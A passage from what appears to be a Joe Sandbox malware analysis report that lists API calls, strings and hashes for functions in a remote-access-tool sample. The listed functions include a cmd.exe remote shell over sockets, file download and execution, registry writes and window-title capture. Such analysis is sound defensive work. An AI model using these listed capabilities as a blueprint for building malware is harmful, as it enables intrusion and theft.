                                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                        • GetLastError.KERNEL32 ref: 0040D083
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateErrorLastMutex
                                        • String ID: SG
                                        • API String ID: 1925916568-3189917014
                                        • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                        • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                        • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                        • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                        Function 00404AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        • WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                        • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EventObjectSingleWaitsend
                                        • String ID:
                                        • API String ID: 3963590051-0
                                        • Opcode ID: a00f43e109d8a5bcbea84027ff4f42fb49a7104e756b4714260ac134e081549c
                                        • Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
                                        • Opcode Fuzzy Hash: a00f43e109d8a5bcbea84027ff4f42fb49a7104e756b4714260ac134e081549c
                                        • Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4
                                        Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                        • RegCloseKey.KERNELBASE(?), ref: 004135F2
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                        • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                        • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                        • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                        Function 004136F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                        • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                        • RegCloseKey.KERNELBASE(00000000), ref: 00413738
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                        • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                        • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                        • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                        Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00413569
                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                        • RegCloseKey.KERNELBASE(?), ref: 00413592
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                        • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                        • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                        • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                        Function 004134FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
                                        • RegCloseKey.KERNELBASE(?,?,?,0040C19C,00466C48), ref: 00413535
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                        • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                        • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                        • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                        Function 00413877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                        • RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                        • RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateValue
                                        • String ID:
                                        • API String ID: 1818849710-0
                                        • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                        • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                        • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                        • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                        Function 00409DE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: pQG
                                        • API String ID: 176396367-3769108836
                                        • Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                        • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                        • Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                        • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                        Function 0041B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE(?), ref: 0041B7CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID: @
                                        • API String ID: 1890195054-2766056989
                                        • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                        • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                        • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                        • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                        Function 0041CAE1 Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FormatMessageA.KERNELBASE(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8), ref: 0041CB09
                                        • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FormatFreeLocalMessage
                                        • String ID:
                                        • API String ID: 1427518018-0
                                        • Opcode ID: f61b3e4ee492e5c6c8ed6053afc0cdea8308696fa5ae5c0b5b9a4b82b5d7ebf3
                                        • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                                        • Opcode Fuzzy Hash: f61b3e4ee492e5c6c8ed6053afc0cdea8308696fa5ae5c0b5b9a4b82b5d7ebf3
                                        • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                                        Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                          • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateEventStartupsocket
                                        • String ID:
                                        • API String ID: 1953588214-0
                                        • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                        • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                        • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                        • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                        Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                        • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                        • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                        • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                        Function 0041BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 0041BAB8
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$ForegroundText
                                        • String ID:
                                        • API String ID: 29597999-0
                                        • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                        • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                        • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                        • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                        Function 00414EE9 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                                        • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                          • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                          • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                          • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                          • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                          • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                        • String ID:
                                        • API String ID: 1170566393-0
                                        • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                        • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                                        • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                        • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                                        Function 004500D4 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00445AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                                        • _free.LIBCMT ref: 00450140
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap_free
                                        • String ID:
                                        • API String ID: 614378929-0
                                        • Opcode ID: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                        • Instruction ID: a633634cbf7549e5c455a263606fb7810d0d6e042387cb83ce13a77316281608
                                        • Opcode Fuzzy Hash: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                        • Instruction Fuzzy Hash: 67014E761007449BE3218F59D881D5AFBD8FB85374F25061EE5D4532C1EA746805C779
                                        Function 00445AF3 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                        • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
                                        • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                        • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC
                                        Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                        • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                        • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                        • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                        Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID:
                                        • API String ID: 724789610-0
                                        • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                        • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                        • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                        • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA

                                        Non-executed Functions

                                        Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                        • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                          • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                          • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                          • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                        • DeleteFileA.KERNEL32(?), ref: 00408652
                                          • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                          • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                          • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                          • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                        • Sleep.KERNEL32(000007D0), ref: 004086F8
                                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                          • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                        • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                        • API String ID: 1067849700-181434739
                                        • Opcode ID: eed5674f21a4eef5d351282a9d2df638c21affdc62bc016a13256b3273593cb3
                                        • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                        • Opcode Fuzzy Hash: eed5674f21a4eef5d351282a9d2df638c21affdc62bc016a13256b3273593cb3
                                        • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                        Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 004056E6
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        • __Init_thread_footer.LIBCMT ref: 00405723
                                        • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                        • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                        • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                        • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                        • CloseHandle.KERNEL32 ref: 00405A23
                                        • CloseHandle.KERNEL32 ref: 00405A2B
                                        • CloseHandle.KERNEL32 ref: 00405A3D
                                        • CloseHandle.KERNEL32 ref: 00405A45
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                        • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                        • API String ID: 2994406822-18413064
                                        • Opcode ID: 13363ddcd6a14ab02b987944c79cdeab18914c86fa514d23f6098caa89b3988f
                                        • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                        • Opcode Fuzzy Hash: 13363ddcd6a14ab02b987944c79cdeab18914c86fa514d23f6098caa89b3988f
                                        • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                        Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 00412106
                                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                          • Part of subcall function 00413877: RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                          • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                        • CloseHandle.KERNEL32(00000000), ref: 00412155
                                        • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
